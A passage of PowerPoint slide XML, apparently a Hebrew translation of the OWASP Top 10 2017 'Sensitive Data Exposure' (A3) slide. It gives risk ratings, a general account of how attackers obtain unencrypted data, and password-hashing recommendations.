                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>salted hash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> מאובטחות בשילוב עם גורמי עיכוב (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>delay factor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>) כגון </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId22"/>
              </a:rPr>
              <a:t>Argon2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId23"/>
              </a:rPr>
              <a:t>scrypt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId24"/>
              </a:rPr>
              <a:t>bcrypt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> או </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId25"/>
              </a:rPr>
              <a:t>PBKDF2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-82550" algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>וודא אפקטיביות הגדרות ותצורה באופן עצמאי.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Text Placeholder 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="83276B"/>
          </a:solidFill>
          <a:ln w="19050">
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="63500" sx="102000" sy="102000" algn="ctr" rotWithShape="0">
              <a:prstClr val="black">
                <a:alpha val="40000"/>
              </a:prstClr>
            </a:outerShdw>
          </a:effectLst>
          <a:scene3d>
            <a:camera prst="orthographicFront"/>
            <a:lightRig rig="threePt" dir="t">
              <a:rot lat="0" lon="0" rev="1200000"/>
            </a:lightRig>
          </a:scene3d>
          <a:sp3d extrusionH="76200">
            <a:bevelT w="63500" h="25400"/>
            <a:extrusionClr>
              <a:schemeClr val="bg1"/>
            </a:extrusionClr>
          </a:sp3d>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="accent4"/>
          </a:lnRef>
          <a:fillRef idx="3">
            <a:schemeClr val="accent4"/>
          </a:fillRef>
          <a:effectRef idx="2">
            <a:schemeClr val="accent4"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="lt1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr tIns="216000" bIns="36000"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2800"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1800"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>A3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1400"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>:2017</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Title 25"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r" rtl="1"/>
            <a:r>
              <a:rPr lang="he-IL" dirty="0" smtClean="0">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>  חשיפת מידע רגיש</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="34" name="Tabelle 1"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3164169174"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="10800" y="957600"/>
          <a:ext cx="6836400" cy="2102400"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:tableStyleId>{D27102A9-8310-4765-A935-A1911B00CA55}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1008000">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1008000">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1396800">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20002"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1404000">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20003"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1011600">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20004"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1008000">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20005"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="554400">
                <a:tc gridSpan="2">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:buNone/>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="45720" marR="4572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sz="1000" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg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gridSpan="2">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="45720" marR="4572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gridSpan="2">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="45720" marR="4572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sz="1000" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg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xmlns="" val="10000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="288000">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr">
                        <a:lnSpc>
                          <a:spcPts val="1200"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>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a:lnSpc>
                          <a:spcPts val="1200"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="1000" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>יכולת</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="1000" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> ניצול: 2</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="18000" marR="18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marL="0" marR="0" indent="0" algn="ctr" defTabSz="914400" rtl="1" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPts val="1200"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="1000" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>שכיחות: 3</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="0" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>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marL="0" marR="0" indent="0" algn="ctr" defTabSz="914400" rtl="1" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPts val="1200"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="1000" b="1" kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>יכולת גילוי: 2</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="0" kern="1200" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                        <a:ea typeface="OpenSymbol"/>
                        <a:cs typeface="+mn-cs"/>
                      </a:endParaRPr>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algn="ctr" rtl="1">
                        <a:lnSpc>
                          <a:spcPts val="1200"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="1000" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>השפעה טכנית: 3</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="0" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>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algn="ctr">
                        <a:lnSpc>
                          <a:spcPts val="1200"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>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1"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="1260000">
                <a:tc gridSpan="2">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="r" rtl="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>במקום לתקוף את מימוש ההצפנה בצורה ישירה, תוקפים נוהגים לגנוב מפתחות הצפנה, להריץ מתקפות </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>man-in-the-middle</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>או לגנוב מידע המאוחסן ע"י שרתים בצורה גלויה, מידע בעת תעבורה ברשת או ישירות מהמשתמש (לדוגמה מהדפדפן). לרוב נדרש לבצע התקפה באופן ידני. ניתן לבצע מתקפות </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>brute force</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> כלפי סיסמאות בסיסי נתונים שפגו.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" kern="1200" dirty="0">
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="45720" marR="4572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nSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx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r" rtl="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>במהלך השנים האחרונות, זו נחשבת המתקפה הנפוצה ובעלת ההשפעה הגדולה ביותר. החולשה השכיחה ביותר מתבססת על כך שלא מבצעים הצפנה של מידע רגיש.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> כאשר מיישמים הצפנה, יצירה או ניהול מפתח הצפנה חלשים, שימוש בפרוטוקולים </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>וב</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>cipher</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> נפוצים, בייחוד עבור אחסון סיסמאות באמצעות  </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>hash</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> פגיע. בנוגע למידע בעת תעבורה, קל לזהות חולשות בצד השרת, אך קשה לזהות חולשות הנוגעות למידע מאוחסן.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" dirty="0" smtClean="0">
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="45720" marR="4572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r" rtl="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>כשלון חוזר פוגע בכל המידע שאמור</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> היה להיות מוגן. לרוב, מידע זה כולל מידע אישי רגיש (</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" baseline="0" dirty="0" smtClean="0">
